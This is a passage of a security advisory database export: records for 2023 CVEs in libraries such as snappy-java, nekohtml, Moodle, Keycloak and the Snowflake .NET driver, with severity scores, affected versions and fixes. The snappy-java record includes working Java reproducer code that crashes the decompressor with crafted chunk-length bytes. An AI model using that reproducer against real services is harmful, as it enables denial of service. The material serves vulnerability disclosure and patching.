'https://github.com/mickhansen/dottie.js/blob/b48e22714aae4489ea6276452f22cc61980ba5a4/dottie.js#L107'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-DOTTIE-3332763'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:34:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-9849-p7jc-9rmv,2023-06-22T19:58:54Z,2023-06-22T19:58:54Z,,['CVE-2022-24839'],org.nokogiri:nekohtml vulnerable to Uncontrolled Resource Consumption,"## Summary The fork of `org.cyberneko.html` used by Nokogiri (Rubygem) raises a `java.lang.OutOfMemoryError` exception when parsing ill-formed HTML markup. ## Severity The maintainers have evaluated this as [**High Severity** 7.5 (CVSS3.1)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). ## Mitigation Upgrade to `>= 1.9.22.noko2`. ## Credit This vulnerability was reported by [이형관 (windshock)](https://www.linkedin.com/in/windshock/). ## References [CWE-400](https://cwe.mitre.org/data/definitions/400.html) Uncontrolled Resource Consumption ## Notes The upstream library `org.cyberneko.html` is no longer maintained. Nokogiri uses its own fork of this library located at https://github.com/sparklemotion/nekohtml and this CVE applies only to that fork. Other forks of nekohtml may have a similar vulnerability. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.nokogiri:nekohtml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.22.noko2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-24839'}, {'type': 'WEB', 'url': 'https://github.com/sparklemotion/nekohtml/commit/a800fce3b079def130ed42a408ff1d09f89e773d'}, {'type': 'PACKAGE', 'url': 'https://github.com/sparklemotion/nekohtml'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T19:58:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-qcm3-vfq5-wfr2,2023-06-12T20:09:30Z,2023-06-06T18:30:20Z,,['CVE-2023-31606'],RedCloth Regular Expression Denial of Service issue,A Regular Expression Denial of Service (ReDoS) issue was discovered in the `sanitize_html` function of RedCloth gem v4.0.0. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'RedCloth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31606'}, {'type': 'WEB', 'url': 'https://github.com/jgarber/redcloth/issues/73'}, {'type': 'WEB', 'url': 'https://github.com/e23e/CVE-2023-31606#readme'}, {'type': 'PACKAGE', 'url': 'https://github.com/jgarber/redcloth'}, {'type': 'WEB', 'url': 'https://github.com/jgarber/redcloth/blob/v4.3.2/lib/redcloth/formatters/html.rb#L327'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/RedCloth/CVE-2023-31606.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/07/msg00002.html'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T20:27:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-fwfj-8p36-rc64,2023-06-30T20:21:14Z,2023-06-22T21:30:49Z,,['CVE-2023-35131'],Moodle vulnerable to Cross-site Scripting,"Content on the groups page required additional sanitizing to prevent an XSS risk. This flaw affects Moodle versions 4.2, 4.1 to 4.1.3, 4.0 to 4.0.8 and 3.11 to 3.11.14.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.1'}]}], 'versions': ['4.2.0']}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.11.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35131'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7A72KX4WU6GK2CX4TKYFGFASPKOEOJFC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I5QAEAGJ44NVXLAJFJXKARKC45OGEDXT/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=447829'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-76683'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:38:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-w2rr-wvh9-m2m7,2023-06-27T21:01:16Z,2023-06-14T15:30:38Z,,['CVE-2023-34615'],JSONUtil vulnerable to stack exhaustion,An issue was discovered JSONUtil through 5.0 that allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.pwall.json:jsonutil'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34615'}, {'type': 'WEB', 'url': 'https://github.com/billdavidson/JSONUtil/issues/10'}]","{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:20:51Z', 'nvd_published_at': None}" 1.4.0,GHSA-x3m2-3pwj-8fj4,2023-06-28T16:29:10Z,2023-06-23T15:30:43Z,,['CVE-2023-3304'],Admidio Improper Access Control vulnerability,Admidio prior to 4.2.9 is vulnerable to Improper Access Control.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'admidio/admidio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3304'}, {'type': 'WEB', 'url': 'https://github.com/admidio/admidio/commit/3b248b7d5e0e60a00ee2f9a6908d538d62a5837f'}, {'type': 'PACKAGE', 'url': 'https://github.com/admidio/admidio'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/721fae61-3c8c-4e4b-8407-64321bc0ed17'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T17:01:07Z', 'nvd_published_at': None}" 1.4.0,GHSA-q97c-2mh3-pgw9,2023-06-28T22:33:26Z,2023-06-28T22:33:26Z,,['CVE-2023-34098'],Shopware dependency configuration exposed,"### Impact Due to a wrong configuration in the `.htaccess` file, the configuration file of Javascript dependencies could be read in production environments (`themes/package-lock.json`). With this information, the used Shopware version might be determined by an attacker, which could be used for further attacks. ### Patches We recommend updating to the current version 5.7.18. You can get the update to 5.7.18 regularly via the Auto-Updater or directly via the release page. https://github.com/shopware5/shopware/releases/tag/v5.7.18 For older versions you can use the Security Plugin: https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html ### References https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-06-2023 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.6.0'}, {'fixed': '5.7.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.7.17'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-q97c-2mh3-pgw9'}, {'type': 'WEB', 'url': 'https://github.com/shopware5/shopware/security/advisories/GHSA-q97c-2mh3-pgw9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34098'}, {'type': 'WEB', 'url': 'https://github.com/shopware5/shopware/commit/b3518c8d9562a38615d638f31f79829f6e2f4b6a'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-06-2023'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware5/shopware'}, {'type': 'WEB', 'url': 'https://www.shopware.com/en/changelog-sw5/#5-7-18'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-28T22:33:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-793w-g325-hrw2,2023-06-30T20:40:47Z,2023-06-30T20:40:47Z,,['CVE-2023-36477'],XWiki Platform vulnerable to persistent Cross-site Scripting through CKEditor Configuration pages,"### Effect Any user with edit rights can edit all pages in the `CKEditor' space. This makes it possible to perform a variety of harmful actions, such as - removing technical documents, leading to loss of service - Editing the javascript configuration of CKEditor, leading to persistent XSS ### Patches This issue has been patched in XWiki 14.10.6 and XWiki 15.1. This issue has been patched on the CKEditor Integration extension 1.64.9 for XWiki version older than 14.6RC1. ### Workarounds The issue can be fixed manually by restricting the `edit` and `delete` rights to a trusted user or group (e.g. the `XWiki.XWikiAdminGroup` group), implicitly disabling those rights for all other users. See https://github.com/xwiki/xwiki-platform/commit/9d9d86179457cb8dc48b4491510537878800be4f ### References - https://jira.xwiki.org/browse/XWIKI-20590 - https://jira.xwiki.org/browse/CKEDITOR-508 - https://github.com/xwiki/xwiki-platform/commit/9d9d86179457cb8dc48b4491510537878800be4f ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-ckeditor-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.6-rc-1'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.contrib:application-ckeditor-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9'}, {'fixed': '1.64.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-ckeditor-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-793w-g325-hrw2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36477'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/9d9d86179457cb8dc48b4491510537878800be4f'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/CKEDITOR-508'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20590'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:40:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-qcwq-55hx-v3vh,2023-08-18T15:45:35Z,2023-06-15T17:15:06Z,,['CVE-2023-34455'],snappy-java's unchecked chunk length leads to DoS,"## Summary Due to use of an unchecked chunk length, an unrecoverable fatal error can occur. ## Impact Denial of Service ## Description The code in the function [hasNextChunk](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/SnappyInputStream.java#L388) in the file [SnappyInputStream.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/SnappyInputStream.java) checks if a given stream has more chunks to read. It does that by attempting to read 4 bytes. If it wasn’t possible to read the 4 bytes, the function returns false. Otherwise, if 4 bytes were available, the code treats them as the length of the next chunk. ```java int readBytes = readNext(header, 0, 4); if (readBytes < 4) { return false; } int chunkSize = SnappyOutputStream.readInt(header, 0); if (chunkSize == SnappyCodec.MAGIC_HEADER_HEAD) { ......... } // extend the compressed data buffer size if (compressed == null || chunkSize > compressed.length) { compressed = new byte[chunkSize]; } ``` In the case that the “compressed” variable is null, a byte array is allocated with the size given by the input data. Since the code doesn’t test the legality of the “chunkSize” variable, it is possible to pass a negative number (such as 0xFFFFFFFF which is -1), which will cause the code to raise a “java.lang.NegativeArraySizeException” exception. A worse case would happen when passing a huge positive value (such as 0x7FFFFFFF), which would raise the fatal “java.lang.OutOfMemoryError” error. ## Steps To Reproduce Compile and run the following code: ```java package org.example; import org.xerial.snappy.SnappyInputStream; import java.io.*; public class Main { public static void main(String[] args) throws IOException { byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff}; SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data)); byte[] out = new byte[50]; try { in.read(out); } catch (Exception ignored) { } } } ``` The program will crash with the following error (or similar), even though there is a catch clause, since “OutOfMemoryError” does not get caught by catching the “Exception” class: ``` Exception in thread ""main"" java.lang.OutOfMemoryError: Requested array size exceeds VM limit at org.xerial.snappy.SnappyInputStream.hasNextChunk(SnappyInputStream.java:422) at org.xerial.snappy.SnappyInputStream.read(SnappyInputStream.java:167) at java.base/java.io.InputStream.read(InputStream.java:217) at org.example.Main.main(Main.java:12) ``` Alternatively - compile and run the following code: ```java package org.example; import org.xerial.snappy.SnappyInputStream; import java.io.*; public class Main { public static void main(String[] args) throws IOException { byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff}; SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data)); byte[] out = new byte[50]; in.read(out); } } ``` The program will crash with the following error (or similar): ``` Exception in thread ""main"" java.lang.NegativeArraySizeException: -1 at org.xerial.snappy.SnappyInputStream.hasNextChunk(SnappyInputStream.java:422) at org.xerial.snappy.SnappyInputStream.read(SnappyInputStream.java:167) at java.base/java.io.InputStream.read(InputStream.java:217) at org.example.Main.main(Main.java:12) ``` It is important to note that these examples were written by using a flow that is generally used by developers, and can be seen for example in the Apache project “flume”: https://github.com/apache/flume/blob/f9dbb2de255d59e35e3668a5c6c66a268a055207/flume-ng-channels/flume-file-channel/src/main/java/org/apache/flume/channel/file/Serialization.java#L278. Since they used try-catch, the “NegativeArraySizeException” exception won’t harm their users, but the “OutOfMemoryError” error can.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xerial.snappy:snappy-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.10.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.10.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/security/advisories/GHSA-qcwq-55hx-v3vh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34455'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea'}, {'type': 'PACKAGE', 'url': 'https://github.com/xerial/snappy-java'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/SnappyInputStream.java#L388'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/SnappyInputStream.java'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0009/'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-15T17:15:06Z', 'nvd_published_at': None}" 1.4.0,GHSA-2jx2-qcm4-rf9h,2023-06-09T19:32:18Z,2023-06-09T19:32:18Z,,['CVE-2021-36153'],Incomplete Internal State Distinction in GRPCWebToHTTP2ServerCodec,"### Impact Affected gRPC Swift servers are vulnerable to precondition failures when parsing certain gRPC Web requests. This may lead to a denial of service. ### Patches The problem has been fixed in 1.2.0. ### Workarounds No workaround is available. Users must upgrade.",[],"[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/grpc/grpc-swift'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grpc/grpc-swift/security/advisories/GHSA-2jx2-qcm4-rf9h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36153'}, {'type': 'WEB', 'url': 'https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=35267'}, {'type': 'PACKAGE', 'url': 'https://github.com/grpc/grpc-swift'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc-swift/releases'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:32:18Z', 'nvd_published_at': '2021-07-09T12:15:00Z'}" 1.4.0,GHSA-779h-3r69-4f5p,2023-06-27T19:48:33Z,2023-06-14T15:30:38Z,,['CVE-2023-34610'],json-io vulnerable to stack exhaustion,An issue was discovered json-io through 4.14.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that have deeply nested structures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.cedarsoftware:json-io'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34610'}, {'type': 'WEB', 'url': 'https://github.com/jdereg/json-io/issues/169'}, {'type': 'PACKAGE', 'url': 'https://github.com/jdereg/json-io'}]","{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:04:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-hww2-5g85-429m,2023-07-14T21:52:02Z,2023-06-29T15:30:34Z,,['CVE-2023-36617'],URI gem has ReDoS vulnerability,"A ReDoS issue was discovered in the URI component before 0.12.2 for Ruby. The URI parser mishandles invalid URLs that have specific characters. There is an increase in execution time for parsing strings to URI objects with `rfc2396_parser.rb` and `rfc3986_parser.rb`. NOTE: this issue exists becuse of an incomplete fix for CVE-2023-28755. Version 0.10.3 is also a fixed version. [The Ruby advisory recommends](https://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617/) updating the uri gem to 0.12.2. In order to ensure compatibility with the bundled version in older Ruby series, you may update as follows instead: - For Ruby 3.0: Update to uri 0.10.3 - For Ruby 3.1 and 3.2: Update to uri 0.12.2. You can use gem update uri to update it. If you are using bundler, please add gem `uri`, `>= 0.12.2` (or other version mentioned above) to your Gemfile.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'uri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'uri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '0.12.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36617'}, {'type': 'WEB', 'url': 'https://github.com/ruby/uri/commit/3cd938df20db26c9439e9f681aadfb9bbeb6d1c0'}, {'type': 'WEB', 'url': 'https://github.com/ruby/uri/commit/4d02315181d8a485496f1bb107a6ab51d6f3a35f'}, {'type': 'WEB', 'url': 'https://github.com/ruby/uri/commit/7e33934c91b7f8f3ea7b7a4258b468e19f636bc3'}, {'type': 'WEB', 'url': 'https://github.com/ruby/uri/commit/ba36c8a3ecad8c16dd3e60a6da9abd768206c8fa'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/uri'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uri/CVE-2023-36617.yml'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230725-0002/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617/'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:52:02Z', 'nvd_published_at': None}" 1.4.0,GHSA-wprv-93r4-jj2p,2023-06-19T19:46:37Z,2023-06-19T19:46:37Z,,['CVE-2023-34459'],OpenZeppelin Contracts using MerkleProof multiproofs may allow proving arbitrary leaves for specific trees,"### Impact When the `verifyMultiProof`, `verifyMultiProofCalldata`, `processMultiProof`, or `processMultiProofCalldata` functions are in use, it is possible to construct merkle trees that allow forging a valid multiproof for an arbitrary set of leaves. A contract may be vulnerable if it uses multiproofs for verification and the merkle tree that is processed includes a node with value 0 at depth 1 (just under the root). This could happen inadvertently for balanced trees with 3 leaves or less, if the leaves are not hashed. This could happen deliberately if a malicious tree builder includes such a node in the tree. A contract is not vulnerable if it uses single-leaf proving (`verify`, `verifyCalldata`, `processProof`, or `processProofCalldata`), or if it uses multiproofs with a known tree that has hashed leaves. Standard merkle trees produced or validated with the [@openzeppelin/merkle-tree](https://github.com/OpenZeppelin/merkle-tree) library are safe. ### Patches The problem has been patched in 4.9.2. ### Workarounds If you are using multiproofs: When constructing merkle trees hash the leaves and do not insert empty nodes in your trees. Using the [@openzeppelin/merkle-tree](https://www.npmjs.com/package/@openzeppelin/merkle-tree) package eliminates this issue. Do not accept user-provided merkle roots without reconstructing at least the first level of the tree. Verify the merkle tree structure by reconstructing it from the leaves.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.7.0'}, {'fixed': '4.9.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts-upgradeable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.7.0'}, {'fixed': '4.9.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-wprv-93r4-jj2p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34459'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/commit/4d2383e17186be3e8ccf5a442e9686ecc7de1c55'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/releases/tag/v4.9.2'}]","{'cwe_ids': ['CWE-354'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-19T19:46:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-hh54-53m7-7ffj,2023-06-13T23:57:23Z,2023-06-07T15:30:17Z,,['CVE-2023-33498'],alist Incorrect Access Control vulnerability,alist <=3.16.3 is vulnerable to Incorrect Access Control. Low privilege accounts can upload any file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/alist-org/alist/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.16.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33498'}, {'type': 'WEB', 'url': 'https://github.com/YUyuanAN-com/loophole'}, {'type': 'PACKAGE', 'url': 'https://github.com/alist-org/alist'}]","{'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-08T18:05:49Z', 'nvd_published_at': None}" 1.4.0,GHSA-223g-8w3x-98wr,2023-06-09T22:40:23Z,2023-06-09T22:40:23Z,,['CVE-2023-34230'],Snowflake Connector .Net Command Injection,"### Issue Snowflake was informed via our bug bounty program of a command injection vulnerability in the Snowflake .NET driver via SSO URL authentication. ### Impacted driver package: snowflake-connector-net ### Impacted version range: before [Version 2.0.18](https://community.snowflake.com/s/article/Dot-NET-Driver-Release-Notes) ### Attack Scenario In order to exploit the potential for command injection, an attacker would need to be successful in (1) establishing a malicious resource and (2) redirecting users to utilize the resource. The attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user’s local machine would render the malicious payload, leading to a remote code execution. This attack scenario can be mitigated through URL whitelisting as well as common anti-phishing resources. ### Solution On December 2nd, 2022, Snowflake merged a patch that fixed a command injection vulnerability in the Snowflake .NET driver via SSO URL authentication. The vulnerability affected the Snowflake .NET driver before Version 2.0.18. We strongly recommend upgrading to the latest driver version as soon as possible via the following resources: [Snowflake .NET Driver](https://docs.snowflake.com/en/developer-guide/dotnet/dotnet-driver). ### Additional Information If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Snowflake.Data'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-net/security/advisories/GHSA-223g-8w3x-98wr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34230'}, {'type': 'PACKAGE', 'url': 'https://github.com/snowflakedb/snowflake-connector-net'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:40:23Z', 'nvd_published_at': None}" 1.4.0,GHSA-3qh5-qqj2-c78f,2023-06-30T20:31:37Z,2023-06-30T20:31:37Z,,['CVE-2023-2422'],Keycloak vulnerable to Improper Client Certificate Validation for OAuth/OpenID clients,"When a Keycloak server is configured to support mTLS authentication for OAuth/OpenID clients, it does not properly verify the client certificate chain. A client that possesses a proper certificate can authorize itself as any other client and therefore access data that belongs to other clients.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-services'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-3qh5-qqj2-c78f'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/5c6c55945a384bfd82e51283096204dcb6f63d91'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:31:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-7w2c-w47h-789w,2023-07-11T20:19:37Z,2023-06-12T19:50:34Z,,['CVE-2023-34246'],Doorkeeper Improper Authentication vulnerability,"OAuth RFC 8252 says https://www.rfc-editor.org/rfc/rfc8252#section-8.6 > the 